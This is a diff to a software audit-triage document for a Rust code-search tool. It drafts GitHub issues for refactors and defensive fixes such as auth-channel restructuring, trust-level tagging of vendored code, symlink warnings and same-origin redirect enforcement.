+3. **Wrong API signatures in test skeletons** — P3-TC-HAP-1's `daemon_reconcile` call passes `&str` for `Option<&str>` and `Vec<String>` for `&[String]`. P3-TC-ADV-1's `unwrap_dispatch_payload(v, ...)` passes value where `&serde_json::Value` is expected.
+4. **Inflated impact framing** — P3-AC-2 says "~30s overrun" when daemon_status timeout is actually 5s. P3-PB-1 says wildcard binds are "missed" when current code DOES warn for them. Mechanical fixes still valid; triage rationale overstated.
+
+### P3 Promotions Suggested
+
+None — no NEEDS FIX entry surfaces a hidden P1. Defects are mechanical (line drift, wrong sig, fictional helper) rather than impact mismeasurement. AC-2 and PB-1 inflated impact still keeps them P3 once the framing is corrected.
+
+# P4 Trivial Inline Fixes
+
+## P4-trivial: SEC-V1.30.1-5 — `trust_level: "user-code"` covers vendored third-party in tree
+**File:** `SECURITY.md` (next to existing trust-level discussion) + `src/store/helpers/types.rs:172-196`
+**Effort:** ~5 min
+**Fix:** Per the audit's "option (a)" suggested fix — add a one-paragraph note to `SECURITY.md` clarifying that `trust_level: "user-code"` means *"from the user's project store"* (i.e., not from a `cqs ref` reference index), not *"authored by the user"*. Vendored upstream content (`vendor/`, `third_party/`, `node_modules/`, copied SDKs committed to the project tree) and content surfaced by `cqs notes mention` from `docs/notes.toml` retain `user-code` even though they are exactly the indirect-prompt-injection surface the trust-level field exists to flag. The proper fix (path-prefix denylist + per-chunk `vendored: bool`) is captured under P4-issue. Doc-only clarification, no code change. Pairs with the SEC-V1.30.1-1 / SEC-V1.30.1-2 lying-docs cluster already in P1.
+
+## P4-trivial: DS-V1.30.1-D6 — duplicate of CQ-V1.30.1-2 (P1)
+**File:** `src/watch_status.rs:199-209`
+**Effort:** 0 min — no separate fix
+**Fix:** Already covered by the P1 fix for CQ-V1.30.1-2 (`compute()` ignores `delta_saturated`). The triage table flags this as a duplicate so it doesn't get re-implemented; reference the P1 PR's commit when closing the audit pass.
+
+## P4-trivial: DS-V1.30.1-D8 — duplicate of CQ-V1.30.1-1 (P1)
+**File:** `src/cli/watch/events.rs:139-146`
+**Effort:** 0 min — no separate fix
+**Fix:** Already covered by the P1 fix for CQ-V1.30.1-1 (`dropped_this_cycle` reset before publish). Same duplicate-cross-reference pattern as DS-V1.30.1-D6.
+
+## P4-trivial: DOC-V1.30.1-8 — subsumed by DOC-V1.30.1-3 (P1)
+**File:** `CONTRIBUTING.md`
+**Effort:** 0 min — no separate fix
+**Fix:** Folded into the DOC-V1.30.1-3 P1 fix (CONTRIBUTING Architecture Overview refresh). When that PR lands, this entry is closed automatically.
+
+## P4-trivial: PF-V1.30.1-2 — covered by RB-9 + RM-2
+**File:** `src/daemon_translate.rs:660-679, 422-510`
+**Effort:** 0 min — no separate fix
+**Fix:** Per the triage notes, this performance complaint is the duplicate of the resource-management (RM-2) and robustness (RB-9) angles on the same code. The RM-2 P4-issue below captures the "fresh socket connect every 250ms" cost; RB-9 (already P3) captures the "no exponential backoff" angle. Closing PF-V1.30.1-2 follows from either being addressed.
+
+# P4 Hard — File as GitHub Issues
+
+## P4-issue: EX-V1.30.1-1 — daemon_ping/status/reconcile near-identical 80-LOC copies
+**Why an issue:** Refactor of three production daemon RPC functions; needs a small design pass for the helper signature (envelope shape, error tag, span name) before touching code. Low risk but worth a focused PR.
+
+**Suggested labels:** `enhancement`, `tier-3`, `extensibility`
+
+**Issue body draft:**
+```
+EX-V1.30.1-1: Extract `daemon_request<T>` to dedupe daemon_ping/status/reconcile
+
+`daemon_ping`, `daemon_status`, and `daemon_reconcile` are three near-identical
+~80-LOC functions in `src/daemon_translate.rs`. Each does the same work:
+
+- socket connect → set_read_timeout → set_write_timeout
+- write request line → flush
+- read response line (64 KiB cap)
+- parse envelope → check `status == "ok"` → extract `output`
+- unwrap dispatch payload → deserialize sequence
+
+The only differences are: (a) the `command` string in the request, (b) the
+`tracing::info_span!` name, (c) the deserialized type, (d) the error tag in
+`unwrap_dispatch_payload`. The 5-second timeout, 64 KiB read cap, and 6+
+`tracing::warn!` `stage=` arms are duplicated verbatim.
+
+Three is the threshold where duplication becomes its own bug surface — a
+future change to the timeout default, or a new error path in
+`unwrap_dispatch_payload`, has to be synced across all three. This is also
+the daemon-client side of the EX-V1.29-1 (Commands trait, #1097) problem.
+
+**Current shape:** `src/daemon_translate.rs:271-356` (ping), `:422-510` (status),
+`:537-621` (reconcile). Three functions, each ~80 LOC, 90% byte-identical
+across the body.
+
+**Proposed direction:** Extract a single helper:
+
+```rust
+fn daemon_request<T: DeserializeOwned>(
+    cqs_dir: &Path,
+    command: &str,
+    payload_label: &str,
+    request_args: serde_json::Value,
+) -> Result<T, String>
+```
+
+The three public entry points become 3-5 line shims that call the helper
+with their command name and expected payload tag. Centralizes timeout,
+read cap, span, and warn `stage=` arms so a future `daemon_gc` or
+`daemon_invalidate` is a one-line addition. Composes with a
+`daemon_request_with_args` overload for the `Reconcile { hook, args }` shape.
+
+**Acceptance criteria:**
+- `daemon_ping`, `daemon_status`, `daemon_reconcile` each ≤ 10 LOC.
+- Existing tests in `src/daemon_translate.rs` (`*_mock_round_trip`) still
+  pass without modification.
+- Adding a hypothetical `daemon_invalidate` becomes one new wrapper plus
+  the helper's existing infrastructure.
+- `cargo build --features cuda-index` warning-clean (no dead-code on
+  `unwrap_dispatch_payload` or any helper).
+
+**Out of scope:**
+- Changing the wire format or envelope shape.
+- Changing `Result<T, String>` to a typed error (covered by API-V1.30.1-5,
+  separate P2 fix).
+- Adding a new daemon RPC.
+```
+
+## P4-issue: EX-V1.30.1-2 — BatchCmd dispatch hand-routed match (33 arms)
+**Why an issue:** Refactor with a real architectural decision (extending the existing `for_each_batch_cmd_pipeability!` macro vs. a separate dispatch table); needs design discussion to keep the macro readable as the variant set grows.
+
+**Suggested labels:** `enhancement`, `tier-3`, `extensibility`, `arch`
+
+**Issue body draft:**
+```
+EX-V1.30.1-2: Drive BatchCmd dispatch from the macro table instead of a 33-arm match
+
+Variant pipeability is now table-driven via `for_each_batch_cmd_pipeability!`
+(issue #1137 fix, `src/cli/batch/commands.rs:372-447`): adding a `BatchCmd`
+variant *requires* adding a `(Variant, bool)` row to the macro or the build
+fails. But `dispatch()` 60 lines further down is still a hand-maintained
+match — 33 arms — with no compile-time check that every variant has a
+handler. Adding a new variant means:
+
+(a) Add the variant — compile-enforced.
+(b) Add the pipeability row — compile-enforced.
+(c) Add the dispatch arm — NOT compile-enforced today (no `_` wildcard,
+    so a missing arm fails). But a future refactor that adds `_ =>` would
+    silently route new variants to nowhere.
+(d) Write the handler.
+
+Plus `Refresh` is special-cased outside `dispatch()` in `dispatch_via_view`
+(line 1481), compounding the surgery cost: a new "side-effect" command
+needs touches in `dispatch_via_view`, `dispatch`, and the pipeability
+table.
+
+**Current shape:** `src/cli/batch/commands.rs:503-636` (dispatch arms), with
+six arms also calling `log_query` (covered separately by EX-V1.30.1-3,
+already P3).
+
+**Proposed direction:** Extend the existing macro table with a handler
+function pointer per row:
+
+```rust
+for_each_batch_cmd!(
+    (Search,   pipeable: false, handler: dispatch_search,   query_field: Some(query)),
+    (Callers,  pipeable: true,  handler: dispatch_callers,  query_field: None),
+    ...
+);
+```
+
+The macro emits both `is_pipeable` and a single `dispatch_handler`
+function. Side-effect commands like `Refresh` get a third column flag
+(`needs_outer_lock`) so `dispatch_via_view` consults the same table
+instead of an `if matches!()` special case.
+
+**Acceptance criteria:**
+- Adding a new `BatchCmd` variant requires editing exactly one row in
+  the macro table plus writing the handler function.
+- All 33 existing dispatch arms collapse into the macro table; `dispatch()`
+  body shrinks to a generated match arm or a simple lookup.
+- The `Refresh` / `Ping` / `Status` / `Reconcile` side-effect commands
+  unify under the same macro-driven path; no `if matches!()` in
+  `dispatch_via_view`.
+- Tests for batch-mode dispatch (existing in `src/cli/batch/`) pass.
+- `cargo expand --features cuda-index src::cli::batch::commands` produces
+  the same dispatch shape as the current hand-rolled match (sanity check).
+
+**Out of scope:**
+- Changing the public `BatchCmd` enum shape.
+- Migrating CLI dispatch (`cli/dispatch.rs`) — that's the EX-V1.29-1
+  Commands trait work tracked in #1097.
+- Adding new commands.
+```
+
+## P4-issue: EX-V1.30.1-4 — `write_slot_model` clobbers all non-`[embedding]` keys
+**Why an issue:** Schema/extensibility issue; touches every future per-slot field. Needs design pass on whether to use `toml_edit` document round-trip or a structured `SlotConfig` builder. Also intersects with #1107 (slot create --model not persisted).
+
+**Suggested labels:** `enhancement`, `tier-3`, `extensibility`, `schema`
+
+**Issue body draft:**
+```
+EX-V1.30.1-4: Replace `write_slot_model` round-trip-clobber with section-preserving edit
+
+`write_slot_model` (`src/slot/mod.rs:307-351`) emits
+`format!("[embedding]\nmodel = {}\n", ...)` and overwrites the entire
+slot.toml. The doc comment at `:300-302` acknowledges the issue and
+hand-waves: *"Existing TOML keys outside [embedding] are not preserved —
+slot.toml is owned by cqs."*
+
+That hand-wave is fine for v1.29.1 (only one section) but expensive the
+moment any future per-slot field lands:
+
+- #1107 already filed: `slot create --model` doesn't persist the model.
+  Fixing it via this code path requires read-modify-write, not the
+  current write-only.
+- Obvious next sections: `[reranker]`, `[splade]`, `[index].backend`,
+  `[chunk].max_seq_len`, per-slot `[ignore]` overrides.
+- Each addition would need: (a) field in `SlotConfigFile`, (b) extending
+  `write_slot_model` to accept it, (c) renaming the function (it now
+  writes more than the model), (d) auditing every existing slot.toml
+  on upgrade.
+
+**Current shape:** `src/slot/mod.rs:307-351` — single `format!()` body,
+deserialize side at `:283-286` only reads `[embedding].model`.
+
+**Proposed direction:** Two options, pick one:
+
+(a) **`toml_edit::Document` round-trip** — read the existing file,
+    parse with `toml_edit`, mutate the requested key, serialize back.
+    Preserves comments and section ordering. Already in workspace
+    (transitive of cargo metadata?); confirm and pull in if needed.
+
+(b) **Structured `SlotConfig` builder** — extend `SlotConfigFile` to
+    cover every section, deserialize-fully on read, serialize-fully
+    on write. Loses comments but is type-safe.
+
+Option (a) is the proper fix for "slot.toml owned by cqs but extensible";
+option (b) is simpler if we accept comment loss.
+
+**Acceptance criteria:**
+- A slot.toml with hand-added keys (e.g. `[notes].project_id = "foo"`)
+  survives `write_slot_model` unchanged.
+- Adding a new `[reranker].preset` field requires zero changes to
+  `write_slot_model` itself — just extend `SlotConfig` and call a
+  `set_field("[reranker].preset", value)` helper.
+- Existing tests in `src/slot/mod.rs` and `slot_create_default_smoke` /
+  `slot_promote_smoke` pass.
+- Fixing #1107 (slot create --model) becomes one call to the new
+  function, not a redesign.
+
+**Out of scope:**
+- Migrating existing slot.toml files (they're forward-compatible; new
+  keys are only read on demand).
+- Adding actual new sections (reranker/splade) — separate features.
+```
+
+## P4-issue: EX-V1.30.1-5 — `check_request` hardcoded three-channel ladder
+**Why an issue:** Auth surface refactor; needs design discussion on the channel-trait signature, ordering policy, and how `AuthOutcome` collapses. Pairs with the P1 SEC-7 leakage fix (CQ-V1.30.1-4 + AC-V1.30.1-5) — landing those first lets this refactor preserve the fix as a property of the query-channel impl.
+
+**Suggested labels:** `enhancement`, `tier-3`, `extensibility`, `auth`
+
+**Issue body draft:**
+```
+EX-V1.30.1-5: Replace `check_request` if/else ladder with `AuthChannel` trait + registry
+
+`check_request` (`src/serve/auth.rs:269-321`) walks three explicit code
+blocks in order: (1) `Authorization: Bearer …` header, (2) `cqs_token_<port>`
+cookie, (3) `?token=…` query param. Each block has its own `for/loop`,
+its own `ct_eq` call, its own success-return.
+
+Adding a fourth channel — mTLS client cert (in the SECURITY threat model
+already), API key for headless CI, session JWT for audit-trail integration,
+SSO bearer — requires:
+
+(a) New code block in `check_request`.
+(b) Possibly a new `AuthOutcome` variant (see how `OkViaQueryParam`
+    triggers a redirect).
+(c) Sibling helper if the channel needs sanitization (the way
+    `strip_token_param` strips `?token=`).
+(d) Explicit ordering decision: does mTLS supersede a bearer header?
+
+Today's three channels also have a known leakage gap (`strip_token_param`
+not case-folding or percent-decoding — covered by P1 CQ-V1.30.1-4) that
+*should* be a property of the channel module, not a free function bolted
+onto the URI walk.
+
+**Current shape:** `src/serve/auth.rs:269-321` (check_request) +
+`:246-260` (strip_token_param) + `:323-332` (AuthOutcome enum). Three
+hand-rolled blocks, one sibling helper, one variant for "channel that
+needs post-auth redirect."
+
+**Proposed direction:**
+
+```rust
+trait AuthChannel: Send + Sync {
+    fn check(&self, req: &Request, expected: &AuthToken) -> Option<ChannelMatch>;
+    fn sanitize_request(&self, req: &mut Request);  // default: no-op
+    fn name(&self) -> &'static str;
+}
+
+struct AuthChannelRegistry {
+    channels: Vec<Box<dyn AuthChannel>>,  // priority order
+}
+```
+
+Each existing channel becomes one impl (~30 LOC):
+- `BearerHeaderChannel`
+- `CookieChannel` (port-aware)
+- `QueryParamChannel` (sanitize_request strips `?token=`)
+
+`AuthOutcome` collapses into `Option<ChannelMatch { needs_redirect: bool }>`
+— single decision point. Adding mTLS/API key/JWT becomes "implement
+the trait, add to the registry constructor."
+
+**Acceptance criteria:**
+- Each of the three existing channels lives in its own ~30-LOC impl
+  block; `check_request` becomes a 5-line registry walk.
+- The P1 SEC-7 fix (`strip_token_param` case-fold + percent-decode)
+  lives entirely inside `QueryParamChannel::sanitize_request`.
+- Ordering policy is explicit and documented (header > cookie > query,
+  matching today's behavior).
+- Auth tests in `tests/cli_serve_auth_test.rs` pass without modification.
+- Adding a stub `MtlsChannel` in a follow-up PR is one new file plus
+  one line in the registry constructor.
+
+**Out of scope:**
+- Actually implementing mTLS / API key / JWT.
+- Changing the wire shape of the cookie or query param.
+- Audit logging of which channel matched (separate observability work).
+```
+
+## P4-issue: EX-V1.30.1-6 — Reconcile fingerprint is `(path, mtime)` only
+**Why an issue:** Schema migration plus reconcile-logic rewrite; spans Store, watch reconcile, GC, and any tool that consumes `indexed_file_origins`. Hard work that needs a design doc before code, especially around the fingerprint policy enum.
+
+**Suggested labels:** `enhancement`, `tier-3`, `data-integrity`, `schema`
+
+**Issue body draft:**
+```
+EX-V1.30.1-6: Add content-hash + size to reconcile fingerprint (schema v23)
+
+`run_daemon_reconcile` (`src/cli/watch/reconcile.rs:84-134`) decides
+"is this file divergent?" by `disk > stored` mtime comparison only
+(line 124). Two well-known reconciliation bugs slip through:
+
+(a) **Coarse-mtime collisions.** WSL DrvFS / NTFS / HFS+ / SMB mount
+    points have ≥1 s mtime resolution. Two saves within the same
+    second produce identical mtimes; reconcile skips the second one.
+    `events.rs:85-100` has a per-FS workaround for the inotify path
+    (the `is_wsl_drvfs_path` toggle), but reconcile's whole-tree-walk
+    path doesn't compensate.
+
+(b) **Content-identical-but-mtime-bumped.** Formatter passes, `touch`,
+    branch checkouts that restore the same content all re-trigger
+    full embedder cost on every `git checkout`. ~3-5k unnecessary
+    reembeds per branch flip on a mid-size repo.
+
+The fingerprint shape is hardcoded into both the SQLite column choice
+(`indexed_files.last_indexed_mtime` is a single i64) and the in-memory
+map type (`HashMap<String, Option<i64>>` from `indexed_file_origins`).
+
+**Current shape:**
+- `src/store/chunks/staleness.rs:627-637` — `indexed_file_origins`
+  returns `HashMap<String, Option<i64>>`.
+- `src/cli/watch/reconcile.rs:84-134` — divergence is a single
+  `disk > stored` predicate.
+- Schema: `chunks.source_mtime` column only.
+
+**Proposed direction:**
+
+```rust
+struct FileFingerprint {
+    mtime: Option<i64>,
+    size: Option<u64>,
+    content_hash: Option<[u8; 32]>,
+}
+
+enum FingerprintPolicy {
+    MtimeOnly,        // current behavior, fast path
+    MtimeOrHash,      // recommended default
+    HashOnly,         // for `cqs index --strict`
+}
+
+impl FileFingerprint {
+    fn matches(&self, other: &Self, policy: FingerprintPolicy) -> bool { ... }
+}
+```
+
+- Schema v23 + migration: add nullable `chunks.source_size INTEGER`
+  and `chunks.source_content_hash BLOB` columns.
+- `indexed_file_origins` returns `HashMap<String, FileFingerprint>`.
+- Reconcile passes the policy to one helper instead of inlining the
+  comparison at 5 callsites.
+- `cqs index --strict` opt-in for hash-on-walk; default path stays
+  mtime-cheap.
+
+**Acceptance criteria:**
+- Schema v23 migration lands with backfill (NULL hash + size for
+  pre-migration rows; first re-embed populates them).
+- `cqs index --force` populates new columns on every chunk.
+- Reconcile reduced to one helper call: `disk_fp.matches(stored_fp,
+  policy)`.
+- A test covering coarse-mtime FS (synthetic stat with 1 s rounding)
+  uses the policy to detect divergence on identical-mtime files.
+- Existing reconcile tests pass.
+- Eval R@5 on test/dev fixtures unchanged (this is plumbing, not a
+  scoring change).
+
+**Out of scope:**
+- Adding the strict-hash flag to `cqs watch` (CLI work, follow-up).
+- Cross-slot summary reuse (separate workflow already documented in
+  feedback_summary_cross_slot.md).
+- Removing the in-memory `HashMap` materialization (covered by RM-5
+  P4-issue below).
+```
+
+## P4-issue: EX-V1.30.1-8 — Reranker is a concrete struct, no trait
+**Why an issue:** Deep refactor; touches every callsite that holds `&Reranker` (search, search_filtered, daemon batch, eval, doctor). Needs design discussion on the trait surface (especially the `expects_token_type_ids` private state) before code.
+
+**Suggested labels:** `enhancement`, `tier-3`, `extensibility`, `eval`
+
+**Issue body draft:**
+```
+EX-V1.30.1-8: Extract `Reranker` trait + ONNX impl + LlmReranker / NoopReranker
+
+`Reranker` (`src/reranker.rs:108-167`) is a concrete struct that bakes
+"ONNX session + tokenizer + token_type_ids feature-detection" directly
+into the type. `RerankerError::Inference(String)` is itself ONNX-shaped.
+
+Adding any non-ONNX scoring family — LLM-judge reranker via the
+existing `BatchProvider` trait, BM25-on-content baseline for IR-eval
+parity, dot-product reranker over a different embedding model, or a
+no-op pass-through for benchmarking — requires touching every callsite
+that holds a `&Reranker` (search, search_filtered, daemon batch, eval
+harness, doctor) and either adding an enum or duplicating each callsite.
+
+The codebase already extracted `BatchProvider` for LLMs
+(`src/llm/provider.rs:42`) — same shape works for rerankers. The
+known BERT-vs-RoBERTa input-shape divergence
+(`expects_token_type_ids: Mutex<Option<bool>>` at lines 121-124) is
+itself a within-implementation polymorphism leak; cleaner trait split
+would put that state inside the impl, not on the trait surface.
+
+**Current shape:** `src/reranker.rs:108-167` (struct + ctor),
+`:172-211` (rerank), `:212-...` (rerank_with_passages). Single
+concrete type, ONNX-only.
+
+**Proposed direction:**
+
+```rust
+pub trait Reranker: Send + Sync {
+    fn rerank(
+        &self,
+        query: &str,
+        results: &mut Vec<SearchResult>,
+        limit: usize,
+    ) -> Result<(), RerankerError>;
+
+    fn rerank_with_passages(
+        &self,
+        query: &str,
+        passages: &mut Vec<RerankPassage>,
+        limit: usize,
+    ) -> Result<(), RerankerError>;
+}
+
+pub struct OnnxReranker { /* current struct fields */ }
+impl Reranker for OnnxReranker { ... }
+
+pub struct NoopReranker;
+impl Reranker for NoopReranker { fn rerank(...) { Ok(()) } ... }
+
+pub struct LlmReranker { provider: Arc<dyn BatchProvider> }
+impl Reranker for LlmReranker { ... }
+```
+
+Hold rerankers as `Arc<dyn Reranker>` everywhere — the existing
+Mutex-around-session pattern means `dyn` overhead is below the noise
+floor. The `expects_token_type_ids` feature detection becomes private
+to `OnnxReranker`.
+
+**Acceptance criteria:**
+- `Reranker` trait + `OnnxReranker` impl with current behavior.
+- `NoopReranker` shipped (eval-harness ablation use case).
+- `LlmReranker` skeleton that delegates to `BatchProvider` (no
+  production use; just proves the trait surface).
+- All call sites switch from `&Reranker` to `Arc<dyn Reranker>`.
+- Eval R@5 on test/dev fixtures unchanged with `OnnxReranker`
+  (this is purely a refactor; no scoring change).
+- An eval-harness ablation switch (`--reranker none|onnx`) lands
+  with `NoopReranker` for instant comparison.
+
+**Out of scope:**
+- Actual LLM reranker production deployment (just the skeleton lands).
+- BM25 reranker (separate feature, future PR).
+- Changing `RerankerError` shape from `Inference(String)` —
+  follow-up if it becomes a constraint.
+```
+
+## P4-issue: SEC-V1.30.1-5 — `trust_level: "user-code"` for vendored content (proper fix)
+**Why an issue:** The doc-only mitigation (in P4-trivial above) is a stop-gap. The proper fix is a path-prefix denylist, per-chunk `vendored: bool`, and downgraded trust level. That requires schema + indexer + JSON-shape changes and careful agent-facing impact analysis.
+
+**Suggested labels:** `enhancement`, `tier-3`, `security`, `schema`
+
+**Issue body draft:**
+```
+SEC-V1.30.1-5 (proper fix): Tag vendored chunks at index time, downgrade trust_level
+
+When `--include-refs` is unset, search results emit
+`trust_level: "user-code"` unconditionally
+(`src/store/helpers/types.rs:172-196`). The "user-code" claim is
+structural — it tracks "did this come from a `cqs ref` reference index"
+not "is this code authored by the project owner."
+
+Vendored/copied third-party code committed into the project tree, and
+content surfaced by `cqs notes` from `docs/notes.toml`, all emit as
+`user-code` despite being exactly the indirect-prompt-injection surface
+the trust-level field exists to flag. SECURITY.md explicitly calls out
+vendored upstream content as a payload vector but the trust-level
+signal cannot distinguish vendored from authored code.
+
+The doc-only mitigation (clarifying SECURITY.md that "user-code" means
+"from project store" not "authored by user") is landing as a P4-trivial
+fix. This issue tracks the proper structural fix.
+
+**Current shape:** `src/store/helpers/types.rs:172-196`
+(`to_json_with_origin`) emits `"trust_level": "user-code"` whenever
+`ref_name.is_none()`. Per-chunk source classification stops at "is
+this from a reference?".
+
+**Proposed direction:**
+
+(1) Add `vendored: bool` column on `chunks` (schema v23 if
+    EX-V1.30.1-6 lands first, else v23 carrying just this field).
+(2) Compile a default path-prefix denylist at index time:
+    `["vendor/", "third_party/", "node_modules/", ".cargo/", "target/",
+    "dist/", "build/"]`. Make it `.cqs.toml`-overridable
+    (`[index].vendored_paths`).
+(3) During `enumerate_files` / index pipeline, mark any chunk whose
+    `origin` starts with a denylist prefix as `vendored: true`.
+(4) `to_json_with_origin` downgrades to `"third-party-code"` for
+    vendored chunks (or a third tier `"vendored-code"` if we want
+    to keep "third-party-code" reserved for `cqs ref` refs).
+
+**Acceptance criteria:**
+- Schema v23 (or v24, depending on EX-V1.30.1-6 ordering) adds
+  `chunks.vendored` column.
+- Default vendor-prefix list documented in CONTRIBUTING.md and
+  matched by an index-time test.
+- `.cqs.toml` `[index].vendored_paths` override honoured by
+  index pipeline.
+- A new chunk with `origin = "vendor/oss-lib/foo.rs"` emits
+  `trust_level: "vendored-code"` in search/scout/onboard JSON.
+- SECURITY.md trust-level table updated to document the new
+  category.
+- Eval R@5 unchanged (vendored chunks still show up in results;
+  only the `trust_level` JSON field differs).
+
+**Out of scope:**
+- Excluding vendored code from indexing entirely (separate config;
+  current behavior preserves it for searchability).
+- Per-chunk attribution beyond the binary user/vendored split.
+- The doc-only stop-gap fix (lands in P4-trivial).
+```
+
+## P4-issue: SEC-V1.30.1-6 — `cqs ref add` accepts symlinked source path with no audit
+**Why an issue:** Security-relevant input validation that needs a clear policy decision (warn vs. refuse) and tests covering the cross-tree symlink case. Not a one-liner.
+
+**Suggested labels:** `bug`, `tier-3`, `security`
+
+**Issue body draft:**
+```
+SEC-V1.30.1-6: Surface symlink resolution in `cqs ref add` source path
+
+`cmd_ref_add` (`src/cli/commands/infra/reference.rs:130-150`)
+canonicalizes the `--source` path via `dunce::canonicalize` but does
+not compare the user-supplied path against the resolved root. If the
+user runs `cqs ref add foo /home/me/projects/foo` against a path
+that's a symlink to `/some/other/dir/proprietary-code/`, the indexed
+corpus is the *target* of the symlink — not what the user asked to
+index.
+
+Nothing in the ref add flow flags the redirection. The reference is
+persisted into `.cqs.toml` as `source = <canonical-resolved-path>`,
+so a follow-up `cqs ref list` shows the resolved path — but if the
+user's mental model is "I added /home/me/projects/foo," the reindex
+behavior is surprising.
+
+Concrete failure case: operators who symlink
+`vendored-monorepo-pull/ → ~/work/customer-A-private/` to "test cqs
+ref" and silently end up with a customer-content reference index.
+Also relevant if `cqs ref add` is used inside CI/automation that
+takes `--source` from a config file controlled by a less-trusted
+contributor.
+
+**Current shape:** `src/cli/commands/infra/reference.rs:130-150` —
+`source = dunce::canonicalize(source)?;` with no comparison or
+warning if it differs from the user input.
+
+**Proposed direction:**
+
+(1) Compare `source_input` (raw user arg, after `Path::new`) to
+    `dunce::canonicalize(source_input)`. If they differ, log a
+    `tracing::warn!` and emit a `warnings: ["source path resolved
+    via symlink to ..."]` field on the JSON return.
+(2) Optionally: add `--allow-symlink-source` opt-in flag; refuse
+    by default with a clear error pointing at the flag and the
+    resolved target.
+
+Option (1) is the smaller change with adequate operator visibility;
+option (2) is the strict-fail variant for CI use.
+
+**Acceptance criteria:**
+- A symlinked source path triggers a `tracing::warn!` with both
+  user-supplied and resolved paths.
+- JSON output includes the warning field.
+- A new test in `tests/cli_ref_test.rs` (or unit in
+  `reference.rs::tests`) creates a symlink-source tempdir,
+  invokes `cmd_ref_add`, asserts the warning fires and the
+  index DB lives at the resolved path.
+- README / SECURITY.md updated to document the resolution behavior.
+
+**Out of scope:**
+- Canonicalizing symlinks *inside* the source tree during the walk
+  (`enumerate_files` already passes `follow_links(false)`).
+- Cross-platform symlink semantics on Windows (this is a Linux/macOS
+  feature for now; Windows symlinks need admin and are rare).
+```
+
+## P4-issue: SEC-V1.30.1-7 — `LocalProvider` redirect policy doesn't enforce same-origin
+**Why an issue:** Security-grade behavior with a behavioural-correctness gap (the comment claims same-origin but the code doesn't enforce it). Needs custom policy closure + tests + verifying reqwest's strip-on-redirect behavior across the pinned version.
+
+**Suggested labels:** `bug`, `tier-3`, `security`, `auth`
+
+**Issue body draft:**
+```
+SEC-V1.30.1-7: Enforce same-origin redirects on bearer-bearing LLM requests
+
+`LocalProvider` HTTP client (`src/llm/local.rs:124-129`) uses
+`Policy::limited(2)` for redirects. The change rationale comment
+claims "Same-origin HTTP→HTTPS redirects on bind-localhost are benign"
+but `Policy::limited(2)` does *not* enforce same-origin. A misconfigured
+`CQS_LLM_API_BASE` (load balancer that 302s from `http://internal-llm/`
+→ `http://attacker-controlled-origin/v1/chat/completions`) follows
+the redirect.
+
+reqwest 0.12.x strips `Authorization` cross-origin by default — so
+this is currently observability-grade (silent 401 instead of "redirect
+to other origin, bearer stripped"). But:
+
+(a) The strip is silent; operators see infinite-401 loops instead
+    of a clean fail-fast.
+(b) A future reqwest bump (or a misconfigured global default) that
+    re-enables cross-origin auth header propagation turns this into
+    a credential-leak path.
+(c) The comment in the code claims a property the code doesn't
+    enforce — that's a maintainability bug at minimum.
+
+**Current shape:** `src/llm/local.rs:124-129` —
+`.redirect(reqwest::redirect::Policy::limited(2))`. Doctor probe
+(`src/llm/local.rs:435-437`) sends `Authorization: Bearer <key>`
+header without same-origin guard.
+
+**Proposed direction:**
+
+```rust
+let same_origin_policy = reqwest::redirect::Policy::custom(|attempt| {
+    let prev = attempt.previous().last();
+    let next = attempt.url();
+    if let Some(prev_url) = prev {
+        if prev_url.origin() != next.origin() {
+            tracing::warn!(
+                from = %prev_url,
+                to = %next,
+                "Refusing cross-origin redirect on bearer-bearing request"
+            );
+            return attempt.stop();
         }
     }
-}
+    if attempt.previous().len() >= 2 {
+        return attempt.stop();
+    }
+    attempt.follow()
+});
+
+Client::builder()
+    .redirect(same_origin_policy)
+    .timeout(timeout)
+    ...
 ```
 
----
+Apply the same policy to the doctor probe.
 
-## P3.46 — Watch reindex: `existing.remove` instead of `.get().clone()`
+**Acceptance criteria:**
+- Cross-origin redirects on `LocalProvider` produce a clear
+  `tracing::warn!` and a fail-fast error, not a silent 401 loop.
+- A test using `wiremock` or `httpmock` simulates a cross-origin
+  302; assert the request errors with a redirect-policy diagnostic.
+- Doctor probe matches the same policy.
+- The misleading comment at `:124-129` is replaced with text that
+  matches what the code enforces.
 
-**Finding:** P3.46
-**Files:** `src/cli/watch.rs:2879-2887`
-**Why:** Per cache hit clones a 4 KB `Embedding` (1024-dim). `.remove()` takes ownership.
+**Out of scope:**
+- mTLS or SAN-based origin matching (origin string compare only).
+- Changing the limit on same-origin redirect chain length
+  (stays at 2).
+```
 
-### Current code
+## P4-issue: PB-V1.30.1-4 — `open_browser` on WSL launches Linux browser via `xdg-open`
+**Why an issue:** WSL platform behavior with multiple fallbacks (`wslview` / `cmd.exe` / `xdg-open`) and a clear ordering. Not a one-liner because it needs `is_wsl()` integration into `open_browser` plus testing across WSL2 with and without `wslu` installed.
+
+**Suggested labels:** `bug`, `tier-3`, `platform-wsl`
+
+**Issue body draft:**
+```
+PB-V1.30.1-4: Detect WSL in `open_browser` and prefer Windows-side default
+
+WSL satisfies `cfg(target_os = "linux")`, so `open_browser`
+(`src/cli/commands/serve.rs:99-132`) hits the Linux branch and
+spawns `xdg-open <url>`. On a fresh WSL install there is no Linux
+GUI / browser, so `xdg-open` either errors with `xdg-open: no method
+available` or hangs trying to launch a non-existent browser.
+
+The user sees `WARN: --open requested but failed to launch browser`
+and has to copy-paste the URL into Windows. The intended behavior
+on WSL is `cmd.exe /c start <url>` (or `wslview <url>` if `wslu` is
+installed) which hands the URL to the Windows default browser.
+
+`is_wsl()` already exists in `src/config.rs:47` and is used elsewhere
+— `open_browser` ignores it.
+
+**Current shape:** `src/cli/commands/serve.rs:117-130` — single
+`#[cfg(target_os = "linux")]` arm, hardcoded `xdg-open`.
+
+**Proposed direction:**
+
 ```rust
-let existing = store.get_embeddings_by_hashes(&hashes)?;
-for (i, chunk) in chunks.iter().enumerate() {
-    if let Some(emb) = existing.get(&chunk.content_hash) {
-        cached.push((i, emb.clone()));
+#[cfg(target_os = "linux")]
+{
+    if cqs::config::is_wsl() {
+        // 1. Try `wslview` (handles auth-token URLs cleanly).
+        // 2. Fall back to `cmd.exe /c start "" "<url>"` (interop layer
+        //    translates the call from WSL Linux).
+        // 3. Final fallback: xdg-open on the off chance a Linux GUI exists.
+        for &cmd in &["wslview", "cmd.exe", "xdg-open"] {
+            let mut args = match cmd {
+                "cmd.exe" => vec!["/C", "start", "", url],
+                _         => vec![url],
+            };
+            ... try-spawn ...
+        }
     } else {
-        to_embed.push((i, chunk));
+        std::process::Command::new("xdg-open")...
     }
 }
 ```
 
-### Replacement
-```rust
